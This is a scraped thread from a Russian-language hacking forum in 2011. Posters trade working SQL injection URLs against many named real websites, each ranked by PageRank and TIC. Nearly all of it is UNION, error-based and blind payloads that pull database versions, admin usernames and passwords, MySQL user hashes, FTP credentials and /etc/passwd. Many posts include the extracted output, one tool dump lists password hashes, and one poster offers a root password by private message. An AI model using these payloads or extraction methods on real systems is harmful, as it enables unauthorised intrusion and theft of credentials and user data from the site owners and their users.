http://www.evrokot.com/catalog.php?pid=0+UNION+SELECT+group_concat(COLUMN _NAME)+FROM%20INFORMATION_SCHEMA.COLUMNS--
PageRank 2
Code:
http://www.crystalcityrestaurant.com/cmspages.php?id=-1+union+select+1,concat%28FName,0x3e,password%29,3 ++from+admin--
Code:
http://www.bobandbarn.com/news/stories.php?id=-42+union+select+1,2,3,version(),5,6,7--+
http://www.rorkesdriftvc.com/discussion.php?topid=15168&forid=-1)+union+select+version()--+
http://www.morrisminorspares.net/shop_item.php?ID=-1936+union+select+1,2,3,version(),5,6,7,8,9,0,1,2, 3,4--+
http://www.sport-shoes.ru/viewitem.php?num=(-312)union(select(1),2,version(),4,5,6,7,8,9,(10)fr om(information_schema.columns)where(table_name)='u sersmin')--+
http://www.vitecmultimedia.com/productv2.php?id=-1+union+select+1,2,3,4,5,6,version%28%29,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44, 45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61 ,62,63,64
winstrool
26.06.2011, 23:12
http://xxxdrom.u-gu.ru/news_view.php?id=1678%27+union+select+1,2,3,concat _ws%280x3a,user%28%29,version%28%29,database%28%29 %29,5,6,7,8+from+adminxxx+--+
user5293@localhost:5.0.91-community-log:user5293_xxxdrom
http://www.frs24.ru/news_view.php?id=-3%27+union+select+1,2,3,4,5,6,concat_ws%280x3a,use r%28%29,database%28%29,version%28%29%29,8+--+
frs24ru@localhost:frs24ru:5.0.26-log
http://www.bboyoriginals.eu/news/news_view.php?id=-104%27+union+select+1,2,concat_ws%280x3a,user%28%2 9,version%28%29,database%28%29%29,4,5,6,7,8,9,0,11 ,12,13,14,15,16,17+from+users+limit+0,1--+
maybe_bboy@localhost:5.0.92-community:maybe_bboy
Агентура.Ru
слепая
Code:
http://www.agentura.ru/dossier/russia/fsb/?id=1307543520+and+%28SELECT+substring%28concat%28 1,password%29,1,1%29+from+bak_users+limit%200,1%29 =1
тИЦ: 1300
PR: 5
Михаил Веллер официальный сайт
Code:
http://www.weller.ru/?id=22&cid=-7+union+select+1,pass,3,4,5+from+users+--+
админка: /users.php
тИЦ: 450
PR: 4
SergioRezza
28.06.2011, 23:55
http://www.advancedbiofuelsassociation.com/news.php?id=-72+union+select+1,concat_ws(0x3a,id,username,passw ord,name,email),3,4,5,6,7,8,9,10,11+from+users+whe re+id=1--
PR: 4 ТИЦ: 0
--------------------------------------------------------------------
http://www.thetech.org/genetics/news.php?id=13%27%20AND%201%3D2%20UNION%20SELECT%2 01%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12% 2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22% 2C23%2C24%2C25%2C26%2C27%2C28%20%23
PR: 7 ТИЦ: 100
Skofield
29.06.2011, 02:15
http://www.foroaeronautico.org/PHP/noticias.php?id=-221+union+select+1,2,3,4,version(),6,7,8,9,10--
Database Version: 5.0.77
Database name: qgp837
User name: qgp837@217.76.130.95
Cennarios
30.06.2011, 03:40
Акция - Интернет без Г**НА продолжается
http://www.euroairport.com/FR/communiques.php?idcommunique=11512+union+select+1, unhex%28hex%28user%28%29%29%29,3,4,5,6,7,8,9,10,11 ,12,13--+
Code:
http://www.bikedekho.com/user-review/tvs-jive/dont-purchase_857-2%20AND%201=0%20UNION%20SELECT%20CONCAT%28%27%20%2 7,%20name,%20%27%20%27,%20pass,%20%27%20%27,%20mai l,%20%27%20%27%29%20FROM%20users%20LIMIT%202,1.htm l
компании Микродата
Code:
http://www.microdata.odessa.ua/shop1/goods.php?id=-99+union+select+1,2,user,4,5,6,7,8,9+from+mysql.us er--+
v: 4
тИЦ: 100 \ PR: 3
Code:
http://www.cheptelaleikoum.com/membre.php?id=-27+/*!UnIoN*/SeLeCT+1,2,3,4,5,6,concat_ws(0x3a,@@version,user() ,database(),@@version_compile_os),8,9,10,11,12,13, 14,15,16,17,18,19--+
4.0.27-max-log:dbo209534058@212.227.114.140: db209534058: pc-linux-gnu
Code:
http://www.trip-hop.net/membre.php?id_membre=-1355+union+all+select+1,concat_ws(0x3a,@@version,u ser(),database(),@@version_compile_os),3,4,5,6,7,8 ,9,10,11,12,13,14,15
5.0.90-log:triphop5base@10.0.84.164:triphop5base: pc-linux-gnu
Code:
http://www.promotie.nl/promo.php?cat=-9+UnIoN+all+select+concat_ws(0x3a,@@version,user() ,database()),2
5.0.91-community:deb8417_hps@localhost:deb8417_hps
KeyGanger
02.07.2011, 15:27
Tech Noir (Веб Дизайн)
Code:
http://www.tnoir.com/work.php?id=131+limit+0+union+select+1,group_conca t(0x3c62723e,concat_ws(0x2e,table_schema,table_nam e,column_name)),3,4,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19+from+information_schema.columns+where+co lumn_name+like+0x2570617325
Яндекс тИЦ:20
Яндекс.Rank:2
Google PageRank:2/10
KeyGanger
02.07.2011, 16:03
[Языки программирования — Life-Prog]
Code:
http://life-prog.ru/view_linux.php?id=3'+limit+0+union+select+1,group_ concat(0x3c62723e,concat_ws(0x207c20,login,passwor d)),3,4+from+users+--+a
Яндекс тИЦ: 40
Яндекс Rank: 3/6
Google PageRank: 3/10
KeyGanger
03.07.2011, 16:59
[ «Свой бизнес» — ведущее российское издание для увлечённых предпринимателей ]Blind SQL injection
[CODE]
Code:
http://www.mybiz.ru/page.php?id=2+and+1=1
http://www.vize.cz/en/news.php?id=-348+union+select+1,2,3,4,5,version%28%29+--+
Вывод в тайтле
http://www.deafmissions.org/?PageID=-16+union+select+1,2,3,4,5,6,7,8,9,10,11,version%28 %29+--+
Expl0ited
06.07.2011, 15:45
Code:
http://apps.facebook.com/sondaggi-fanpage/vote.php?id=(0)union(select(1),version(),3,4,5,6,7 ,8,9)--+
5.1.45-log
Code:
http://www.webmobileshop.com/mobiledetails.php?mobileid=412+union+select+1,2,3, 4,concat_ws(0x3a,username,password,email),6,7,8,9+ from+alumni_admins+--+
PR 2
Code:
http://www.freshex.at/webshop/webshop.php?product_group=-4+union+select+version()+--+
PR 2
5.0.51a-24+lenny5
Lam3rsha said:
http://www.mmorpg-servers.com/index.php?cat=RF+Online&qq=2.2.2' если есть у когонить возможность раскруть скуль буду благодарна
Code:
http://www.mmorpg-servers.com/index.php?cat=RF+Online&qq=2.2.2'and(select/**/1/**/from(select/**/count(*),concat(version(),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)and'1'='1
version: 5.0.92-community
user: mmoserv_mmoserv
database: mmoserv_mmoservers
Вывод таблиц:
Code:
http://www.mmorpg-servers.com/index.php?cat=RF+Online&qq=2.2.2'and(select/**/1/**/from(select/**/count(*),concat((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema!='information_schema'/**/limit/**/0,1),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)and'1'='1
Osstudio
08.07.2011, 01:24
Интернет магазин книг.
http://www.tech-books.purput.ru/newsdetail.shtml?idnews=21+and+1=0+union+select+us er%28%29,database%28%29,version%28%29--
bloodAngel
08.07.2011, 10:56
Code:
http://www.bard.edu/academics/additional/additional_pop.php?id=204042-999999+union+select+1,2,version(),4,5,6,7,8,9,10,1 1,12,13,14--
Тиц 90 Пр 7 , еду
bloodAngel
08.07.2011, 10:58
Code:
http://www.gs1.org/1/gtinrules/index.php/nid=1%20or%281,2%29=%28select*from%28select%20name _const%28version%28%29,1%29,name_const%28version%2 8%29,1%29%29a%29
'5.0.51a-24+lenny5-log'
Тиц 90 Пр 7 ))))
http://www.mtucizone.ru/teacher/list.htm?id=-12+union+select+1,2,concat_ws(0x3a,name,password), 4+from+mtucizone.ibf_members--
SergioRezza
08.07.2011, 22:28
http://www.thefump.com/artist.php?id=11%20%26%26%201%3D2%20UNION%20SELECT +1,2,3,4,concat_ws(0x3a,id,username,password,email ,paypal_email),6,7,8,9,10,11,12,13,14,15,16+from+u sers%23
расшифровывайте =)
cannabisfunclub.com
конопляный ресурс
Code:
http://www.cannabisfunclub.com/chtivo/?news=-215+union+select+1,2,3,version%28%29,5,6,7,8,9,10, 11,12,13,14+--+
version: 5.0.51a-community
database: mrc_db2
user: mrc_db2@localhost
http://www.townoflakeshore.on.ca/lakeshore_1.php?page=-11(7 колонок)
5.0.67:
lakeshore@172.27.1.10:
lakeshore_lakeshore:
suse-linux-gnu
PR 4
http://www.lakeshore.ca/events.php?id=-722(5 колонок)
5.0.67:
lakeshore@172.27.1.10:
lakeshore_lakeshore:
suse-linux-gnu
PR 4
http://www.hawaii.edu/uhhbiology/index.php?page=person&id=-43(14 колонок)
4.1.20-standard-log:
uhhbiology@web41.pvt.hawaii.edu:
uhhbiology_d:sun-solaris2.8
PR 8
http://www.mycrysis.com/forums/memberlist.php?mode=viewprofile&u=679708%27
(ппц,phpbb 2007, mysqli(4.1++))
PR5
http://www.gilcentr-sk.ru/?id=-22+union+select+1,2,3,4,5,version(),7,8,9--
http://busexplorer.com/PHP/FeaturePage.php?id=-22+union+select+1,group_concat(0x0b,table_name),3, 4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_ schema.tables--
http://www.taliman-nsk.ru/?page=goodslist&id=-22+union+select+1,group_concat(0x0b,table_name)+fr om+information_schema.tables--
totenkopf
10.07.2011, 19:25
Code:
http://www.dalsouple.com/News.php?nid=2+and+0+UNION+SELECT+1,2,3,concat_ws( 0x3a,user(),version(),database()),5,6+--+
http://www.easyfresh-logistics.com/news.php?nid=2'+and+0+UNION+SELECT+1,2,3,4,concat_ ws(0x3a,user(),version(),database()),6+--+
http://www.globestravel.com/php/newsDetails.php?nid=2+and+0+UNION+SELECT+1,2,conca t_ws(0x3a,user(),version(),database()),4+--+
http://www.greatecs.com/en/news/details.php?nid=2+and+0+UNION+SELECT+1,2,3,4,conca t_ws(0x3a,user(),version(),database()),6,7,8+--+
http://www.midrma.com/News.php?nid=2+and+0+UNION+SELECT+1,2,concat_ws(0x 3a,user(),version(),database()),4+--+
http://www.molecularpartners.com/tmp2.php?nid=2&sid=5&cid=12+and+0+UNION+SELECT+1,2,3,4,5,concat_ws(0x3a ,user(),version(),database()),7,8+--+
http://www.music-powerhouse.com/news.php?nid=2'+and+0+UNION+SELECT+1,concat_ws(0x3 a,user(),version(),database())+--+
http://www.pacificwestsound.com/news.php?nid=2+and+0+UNION+SELECT+concat_ws(0x3a,u ser(),version(),database())+--+
http://www.pcgengr.com/news_detail.php?nid=2+and+0+UNION+SELECT+1,2,3,4,c oncat_ws(0x3a,user(),version(),database())+--+
http://www.pickcells4pixels.com/index.php?nID=2+and+0+UNION+SELECT+1,2,3,4,5,6,7,8 ,9,10,11,concat_ws(0x3a,user(),version(),database( )),13,14+--+
http://www.portmeirion-village.com/content.php?nID=2;lID=1+and+0+UNION+SELECT+1,conca t_ws(0x3a,user(),version(),database()),3,4+--+
Немного жира.
Московская торгово-промышленная палата.ТИЦ 1600 PR 5
Code:
http://www.mostpp[это не я].ru/news.php?id=-5805+union+select+concat_ws(0x3a,login,pass)+ from+users+limit+0,1
Имеем инъекцию с выводом в сорце:
Code:
Вернуться к общему списку сообщений
и как подобает подобным сайтам, с паролями в plaintext.
Ислам для всех. ТИЦ 850 PR 3
Code:
http://islam.com.[не, посоны - я не разжигаю]ua/admin/modules/articles/print.php?nid=-1+union+select+1,2,3,4,version(),database(),7,8,9, 10,user(),12,13
Имеем инъекцию в MySQL 4.1.25 с 3-мя принтабельными полями.
И на закуску - Социальная сеть с over 275к акками на борту.
Code:
http://www.33hoch[посоны, я не при делах]u.ru/likes.php?id=-122604'+or+1+group+by+concat((select+login+from+us er+limit+275000,1),floor(rand(0)*2))having+min(0)+ or+1--+
Имеем инъекцию с выводом в ошибке.
winstrool
10.07.2011, 23:33
pr 3 тиц 60
http://foxconncase.ru/index.php?id=10&model=-86+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,use r(),version(),database()),0,11,12,13,14+--+&series=15&cHash=b165aa222fe72a04b3041cf1274ec149
u58908@10.8.0.102:5.0.90-log:u58908
pr 2 тиц 10
http://www.nks24.ru/text.php?id=-24+union+select+1,concat_ws(0x3a,user(),version(), database()),3,4,5,6+--+
u99856@78.108.84.161:5.0.90:b99856_nks24
pr 3 тиц 70
http://dead-cities.ru/text.php?id=8600000000000000000'+UnIon+selECt+1,co ncat_ws(0x3a,user(),version(),database())+--+
dbu_kovaldji_1@192.168.9.91:5.0.77-log:db_kovaldji_1
pr 2
http://proishestvie.org/page.php?id=-1'+union+select+1,2,concat_ws(0x3a,user(),version( ),database()),4,5,6,7+--+
lito@localhost:5.1.54-rel12.5-log:lito
Cennarios
11.07.2011, 19:17
www.zacks.com
PR 7
http://www.zacks.com/blog/archive.php?g=-6+union+select+1,2,version%28%29,4,5,6--+
pr 3, тиц 70
Code:
http://www.i-watch.ru/?section=7&sid=-3+union+select+1,2,3,version(),5,6,7--+
5.0.51a-24+lenny4
___
пр: 4, тиц: 30
Code:
http://www.watch.su/search_cat.php?word=&start=1a&end=20a&where=1)and(select 1 from(select count(*),concat((select version()),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
5.0.33
Code:
http://cluster2.space.swri.edu/article.php?id=-1+union+select+1,2,concat_ws(0x3a,user,password),4 ,5,6,7,8+from+mysql.user+--+
PR 4
Code:
http://www.thalictrum.com/index.php?pageid=6&artid=-6+union+select+1,concat_ws(0x3a,id,username,passwo rd),3,4,5,6,7,8,9,10,11,12+from+user+--+
4.1.20
PR 4
Code:
http://www.gp.org/press/pr-state.php?ID=-416'+union+select+version(),2,3,4,5,6+--+
5.0.45-log
тиЦ 30
PR 6
Code:
http://www.bdnews24.com/details.php?cid=10&id=-195068+union+select+1,2,concat_ws(0x3a,ftpurl,ftpu ser,ftppass)+from+ftpsecure--
Инфа выводится справа под блоком фейсбука ))
5.0.45-log
тИЦ 30
PR 5
Code:
http://www.africasia.com/africanbanker/afbnk.php?ID=-2356+union+select+version(),2,3,4,5,6,7,8,9,10+--+
5.0.84-log
тИЦ 50
PR 6
Code:
http://www.infovis.net/printMag.php?lang=2&num=-98+union+select+1,2,3,4,version(),6,7,8,9,10,11,12 ,13+--+
5.0.67-Max
тИЦ 10
PR 5
Code:
http://www.mysecret.tv/secret.php?id=3964+union+select+1,2,3,4,concat_ws( 0x3a,user_id,username,password,email),6+from+user+--+
5.0.58
тИЦ 10
PR 3
Code:
http://www.thisweekinpalestine.com/details.php?id=3323&ed=191&edid=-191+union+select+1,concat_ws(0x3a,id,username,emai l,password),3,4,5+from+members+limit+1,1+--+
5.0.77
тИЦ 10
PR 5
тИЦ 10 PR 1
HTML:
http://www.lz-studia.ru/index.php?p=111&idp=-4+union+select+1,2,version(),4
тИЦ 10 PR 4
HTML:
http://www.hobbycenter.by/news.php?id=27+union+select+1,2,3,4,5,6--
Cennarios
16.07.2011, 18:52
http://www.fair.org/index.php?page=22&media_view_id=-10679+union+select+1,2,3,4,5,user%28%29--+
TO:Kuteke - Задолбали постить ковычку - Раздел называется SQL-INJECTION - вот и выкладывай РАБОЧУЮ инъекцию а не линк перекрытый ковычкой.
тИЦ 0 PR 3
HTML:
http://www.nnovia.com/news.php?id=2+union+select+1,2,3,4,5,6,7,8,9--
тИЦ 0 PR 3
HTML:
http://scuderiatopolino.com/news.php?id=2+union+select+1,2,3,4,5,6--
2Cennarios: ОК! Исправил)
<Cyber-punk>
17.07.2011, 21:27
PR 4
http://www.luxsoft.eu/luxcal/index.php?xP=11&id=-326415+union+all+select+1,2,@@version,user(),5,dat abase(), 7,8,9, 10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27--
PR 2
http://www.menus.ca/restaurant.php?id=-1%20and(select%201%20from(select%20count(*),concat ((select%20(select%20user())%20from%20`information _schema`.tables%20limit%200,1),floor(rand(0)*2))x% 20from%20`information_schema`.tables%20group%20by% 20x)a)%20and%201=1
Code:
http://www.heaalgus.ee/index.php?e_id=(@:=1)or@+group+by+concat(@@version ,@:=!@)having@||min(0)--+
VERSION:5.0.92-log1
ЛУЗЕР:heaalgus@nw.eenet.ee1
winstrool
18.07.2011, 15:27
тиц 20 пр4
http://www.voentursnar.ru/product.php?cat=-35'+union+select+1,concat_ws(0x3a,user(),version() ,database()),3,4,5,6,7,8,9,0,11,12+--+
e3cdrcom_voentur@localhost:5.0.26-log:e3cdrcom_voentur
тиц 10 пр2
http://www.m-graf.ru/prod.php?id=3&id2=0&item=-13'+union+select+1,2,3,4,concat_ws(0x3a,user(),ver sion(),database()),6,7,8,9,0,11,12,13,14,15,16+--+
m-graf-6@web21.corp.parking.ru:4.1.20-community-nt-log:m-graf-6
пр1
http://alekseysannikov.ru/pages/videosemka_article.php?num=-2+union+select+concat_ws(0x3a,user(),version(),dat abase()),2,3+--+
p4707_db@91.218.229.12:5.0.92-50-log4707_db
тиц 10 пр2
http://www.kazango.ru/catalog/view.php?id=-182'+/*!UNION*/+/*!SELECT*/+1,2,3,4,5,6,concat_ws(0x3a,user(),version(),datab ase()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42+--+
coa191@localhost:5.1.49-rel11.3-log:coa191_kazango
Expl0ited
19.07.2011, 14:56
Code:
http://apps.facebook.com/mypersonality/view_reviews.php?rating=1&test_id=10+and(1=0)union(select(1),version(),3,4,5 ,6,7,8,9,10,11,12,13)--+
5.0.67-log
бла бла блеать
http://addr.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=/etc/passwd&aid=-2/**/union/**/select/**/0,concat_ws%280x3a,email,username,name,password,us ertype,block%29,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0+from+jos_users--
http://kostomuksha-city.ru/main.phtml?nid=-1+union+select+1,2,version%28%29,4,5
Code:
http://www.neutralposture.com/_site/news.php?id=-12+union+select+1,version(),user(),4,5,6+--+
http://www.neutralposture.com/_site/news.php?id=-12+union+select+1,2,concat_ws(0x3a,user,password), 4,5,6+from+mysql.user+--+
тИЦ 10
PR 5
P.S. Пасс от рута могу отправить в лс кому надо)
----
Code:
http://www.reproductivemedicine.com/toc/auto_abstract.php?id=-21868+union+select+1,version(),3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22+--+
5.0.45
тИЦ 20
PR 5
----
Code:
http://www.autodostavka.ru/index.php?id=729&model=-1274'+union+select+1,2,3,4,5,version(),7,8+--+
5.1.54-log
тИЦ 200
PR 4
----
Code:
http://www.libertynickels.org/articles.php?num=-6+union+select+1,concat_ws(0x3a,username,password) ,3,4+from+users+--+
PR 2
----
Code:
http://www.feldgrau.com/articles.php?ID=-54+union+select+1,2,3,4,version(),6,7,8+--+
5.0.51a-3ubuntu5.8
тИЦ 40
PR 5
Code:
http://www.vertigomagazine.co.uk/showarticle.php?sel=bac&siz=1&id=-927+union+select+1,2,concat_ws(0x3a,userid,loginna me,password,access),4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 ,33+from+users+--+
тИЦ 10
PR 5
--
Code:
http://www.maketheroad.org/article_print.php?ID=-178+union+select+version(),2,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23+--+
5.1.54
тИЦ 10
PR 6
Code:
http://www.igps.net/about/press.php?id=-101+union+select+1,2,version(),4,5,6,7,8+--+
5.0.51a-24+lenny4-log
PR 5
Code:
http://www.cyberbody.ru/product.php?id=-569+union+select+1,version(),3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32+--+
5.0.90-log
тИЦ 20
PR 3
Code:
http://www.director-online.com/buildArticle.php?id=-988+union+select+1,2,3,4,5,concat_ws(0x3a,user_nam e,user_password),7,8+from+user+limit+0,1+--+
5.1.58-community-log
тИЦ 10
PR 5
Code:
http://www.fluidanims.com/collections.php?id=-7+UNION+SELECT+1,2,3,concat_ws%280x3a,user%28%29,v ersion%28%29,database%28%29%29--
Username: fluidanimsgrid@184.168.193.76
Version: 5.0.91-log
Database: fluidanimsgrid
Google PR: 4
Code:
http://www.guuui.com/posting.php?id=-2058+union+select+1,2,3,concat_ws(0x3a,name,email, password),5,6,7,8,9,10,11,12,13,14+from+users+--+
5.0.91-log
тИЦ 20
PR 5
immortalist
21.07.2011, 06:24
ТиЦ 20, ЯК
http://telefan.ru/realtone.php?id=-1 UNION ALL SELECT concat(0x7e,0x27,(Select @@version),0x27,0x7e)--
Code:
http://katrinalist.columbia.edu/details.php?id=-82+union+select+1,2,version(),4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32+--+
4.1.22-log
PR 4
Code:
http://ripflv.com/video.php?id=-32013+union+select+1,2,load_file('/etc/passwd'),4,5,6,7,8,9,10,11,12,13,14,15+--+
5.0.77
PR 3
Code:
http://www.wildflower.org/feature/?id=-27+UNION+SELECT+1,2,3,concat_ws%280x3a,user%28%29, version%28%29,database%28%29%29,5,6,7,8--
Username: wildflow_npin@homer.cc.utexas.edu
Version: 5.0.76-enterprise-gpl-log
Database: wfc_weblive
Google PR: 7
Code:
http://www.riviera-crimea.com/detail.php?id=-425'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,co ncat_ws(0x3a,user(),version(),database()),15,16+--+
riviera_bd@localhost
5.1.47
riviera_w
cy: 10, pr 3
Code:
http://www.designforchange.co.uk/news_detail.php?id=-84+union+select+1,concat_ws%280x3a,user%28%29,vers ion%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11,12--
Username: designfo_user@localhost
Version: 5.0.92-community
Database: designfo_main
Google PR: 6
===================
Code:
http://www.shelterbox.org/deployment_details.php?id=-150+UNION+SELECT+1,2,concat_ws%280x3a,user%28%29,v ersion%28%29,database%28%29%29,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45 ,46,47,48,49,50,51,52,53,54%20from%20chAdmin--
Username: shelterbox@localhost
Version: 5.1.52
Database: shelterbox
НЕ БОЯН! зона домена другая.
Google PR: 6
Code:
http://soglasovanie-vremen.ru/page.php?id=0'+union+select+1,concat_ws(0x3a,user( ),version(),database()),3,4,5+--+
karakovski@localhost
5.1.49-rel11.3-log
karakovski
PR 3
Code:
http://www.shanalogic.com/idevaffiliate/idevads.php?id=175&ad=-1+union+select+1,2,3,concat_ws%280x3a,user%28%29,v ersion%28%29,database%28%29%29,5,6--
Username: shanalog_idev@10.2.2.10
Version: 5.0.77
Database: shanalog_idev
Google PR: 4
Shop
winstrool
23.07.2011, 22:31
тиц 10 пр4
http://sscw.ee/pages/modules/event_calendar/details_popup.php?entry_id=-85+union+select+1,2,3,4,concat_ws(0x3a,user(),vers ion(),database()),6,7,8+--+
d21554sa28781@sn5.zone.eu:5.1.37-log:d21554sd21106
пр2 тиц 30
http://www.ickovcheg.ru/?s=&newsid=100+union+select+1,2,concat_ws(0x3a,user(), version(),database()),4,5+--+
anderew_bd@77.221.130.2:5.1.49-3-log:anderew_bd
пр2
http://www.agent2k.ru/?s=adv&advid=1+union+select+1,2,3,4,concat_ws(0x3a,user() ,version(),database())+--+
u143185_1@10.8.0.60:5.0.90-log:u143185_1
тиц 20 пр2
http://www.konstruktiv.ru/?n=39+union+select+1,2,concat_ws(0x3a,user(),versi on(),database()),4+--+
m0rri5_root@localhost:4.1.25-log:m0rri5_ievk
тиц 10 пр2
http://www.centerclub.ru/index.php?cat=about&r_id=18'+union+select+1,concat_ws(0x3a,user(),vers ion(),database()),3,4+--+
centerclub_base@localhost:5.0.77:ilya_centerclub
пр2
http://www.oktan.com.ua/auto_sites/view.php?id=-172+UnIon+selECt+1,concat_ws(0x3a,user(),version() ,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18+--+
oktan_admin@localhost:5.1.49-3-logktan_main
тиц 110 пр4
http://www.obruch.ru/index.php?id=8&n=30&r=9+union+select+1,concat_ws(0x3a,user(),version() ,database()),3,4,5+--+
vh27377@zvm12.host.ru:4.0.27-log:vh27377
тиц 20 пр1
http://www.soyuznik.ru/index.php?catID=-1416+union+select+1,2,3,concat_ws(0x3a,user(),vers ion(),database()),5,6,7,8,9,0,11,12,13,14,15+--+
gb_soyuz_unix@10.0.2.2:5.0.70-log:gb_soyuz_unix
August12
25.07.2011, 03:57
Target: http://www.bowenshideout.com/items.php?id=87
Host IP: 65.61.119.130
Web Server: Apache/2.0.58 (Unix) PHP/4.4.6 mod_ssl/2.0.58 OpenSSL/0.9.7i
Powered-by: PHP/4.4.6
DB Server: MySQL >=5
Resp. Time(avg): 931 ms
Current User: ann@localhost
Sql Version: 5.0.15
Current DB: nichebox
System User: ann@localhost
DB User: 'ann'@'localhost'
Data Bases: information_schema
amiecleans
busbywc
divinelightmassage
flsrv
foxyhorseandhound
hallowedpoints
mobfamilygaming
nichebox
nichebox1
nichebox2
nichebox3
nichebox4
skipcook
spokanesporthorse
theamericanschoolforequestrianart
thelotteryclub
upc
zodle_calendar
zodle_classifieds
zodle_directory
==========================================
Blind
Target: http://www.depalo.com/view_item.php?id=2257
Host IP: 64.226.181.99
Web Server: Apache
DB Server: MySQL >=5
Resp. Time(avg): 1227 ms
Current User: depaloUser@localhost
Sql Version: 5.0.77-log
Current DB: depalo
System User: depaloUser@localhost
Host Name: ipdmmg0021atl2.pubip.peer1.net
Installation dir: /usr/
DB User: 'depaloUser'@'%'
Data Bases: information_schema
depalo
==================================================
Target: http://enbarsenal.com/item/view_item.php?id=2257
Host IP: 69.163.133.73
Web Server: Apache
DB Server: MySQL >=5
Resp. Time(avg): 899 ms
Current User: net7user@apache2-prance.gravano.dreamhost.com
Sql Version: 5.1.53-log
Current DB: net7
System User: net7user@apache2-prance.gravano.dreamhost.com
Host Name: fwap
Installation dir: /data/mysql/deakyne/
DB User: 'net7user'@'67.205.0.0/255.255.192.0'
Data Bases: information_schema
net7==============================================
Target: http://www.yourprops.com/view_item.php?movie_prop=10270
Host IP: 74.208.106.166
Web Server: Apache/2.2.6 (Fedora)
Powered-by: PHP/5.1.6
DB Server: MySQL >=5
Resp. Time(avg): 909 ms
Current User: admin@localhost
Sql Version: 5.0.27
Current DB: yourprops
System User: admin@localhost
Installation dir: /usr/
DB User & Pass: admin:5fb503f751512093:localhost
pma_IiabUsiU1n6q:6c4572a01bdfb70d:localhost
horde:039b58f6547b38c2:localhost
pma_g5Dqcuu61ikC:60fb772f4a1fa923:localhost
pma_AVMLiZ09j6Cb:05e06de46f9baae2:localhost
yourprops:6632bfb46db6d97e:%
Data Bases: information_schema
horde
mysql
phpmyadmin_AVMLiZ09j6Cb
phpmyadmin_IiabUsiU1n6q
phpmyadmin_g5Dqcuu61ikC
psa
yourprops
НЕ надо плодить посты, забивай все в один пост, если после тебя ни кто не постил cообщения
winstrool
26.07.2011, 00:50
пр1
http://www.stepportal.ru/view_item.php?id=-7'+UnIon+selECt+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,u ser(),version(),database()),11,12,13+--+
gb_z_stepp17f@10.0.2.19:5.1.46-log:gb_z_stepp17f
тиц 10 пр2
http://www.club-parlament.de/ajg/view_item.php?id=28052000000000000+union+select+co ncat_ws(0x3a,user(),version(),database())+--+
drupal@localhost:5.1.49-3:d_parlament
пр1
http://www.lighter.ru/view_item.php?id=1156+UnIon+selECt+1,2,3,concat_ws (0x3a,user(),version(),database()),5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20+--+
lighter@zvm13.host.ru:4.0.27-log:lighter
тиц 10
http://tiger.in.ua/view_item.php?id=-541+union+select+1,2,3,4,5,6,concat_ws(0x3a,user() ,version(),database()),8,9,0,11,12,13,14,15+--+
mandrey_tiger@localhost:4.0.27-standard-log:mandrey_tiger
http://mandrey.uran.biz.ua/view_item.php?id=-100+union+select+1,2,3,4,5,6,concat_ws(0x3a,user() ,version(),database()),8,9,0,11,12,13,14,15+--+
mandrey_profi@localhost:4.0.27-standard-log:mandrey_profi
Cennarios
26.07.2011, 14:28
Ахтунг )
http://www.spaceweather.com/flybys/sat_popup.php?sat_name=-Idefix%20and%20Ariane%2042B%27+union+select+1,2,3, 4,version%28%29,6,7,8--+
winstrool
26.07.2011, 18:08
http://opulent-style.com/view_item.php?id=473+OR+(SELECT+COUNT(*)+FROM+(SEL ECT+1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CON CAT(MID((select+concat_ws(0x3a,user(),version(),da tabase()),1,63),+FLOOR(RAND(0)*2)))--+
artem@68.178.254.169:4.1.24-max-log:artem
http://elgaucho.ru/newsite/ru/culture.php?id=80000000000000+union+select+1,conca t_ws(0x3a,user(),version(),database()),3,4,5,6,7,8 +--+
elgaucho_mysql@10.1.137.54:5.1.41-log:elgaucho_elgaucho
http://www.koreatravel.ru/culture/index.php?id=-95'+union+select+1,2,concat_ws(0x3a,user(),version (),database())+--+
koreatrave@localhost:5.0.26-log:koreatrave
http://www.maglogos.ru/catalog.php?r=-10+union+select+1,concat_ws%280x3a,user%28%29,vers ion%28%29,database%28%29%29,3+--+
veretenina_bs@localhost:5.0.77-log:veretenina_bs
http://www.kabelcom.ru/content.php?id=16+union+select+1,concat_ws%280x3a, user%28%29,version%28%29,database%28%29%29+--+
kabelcomru@localhost:5.1.50-lk-log:kabelcomru
COOLBOY007
26.07.2011, 22:10
Code:
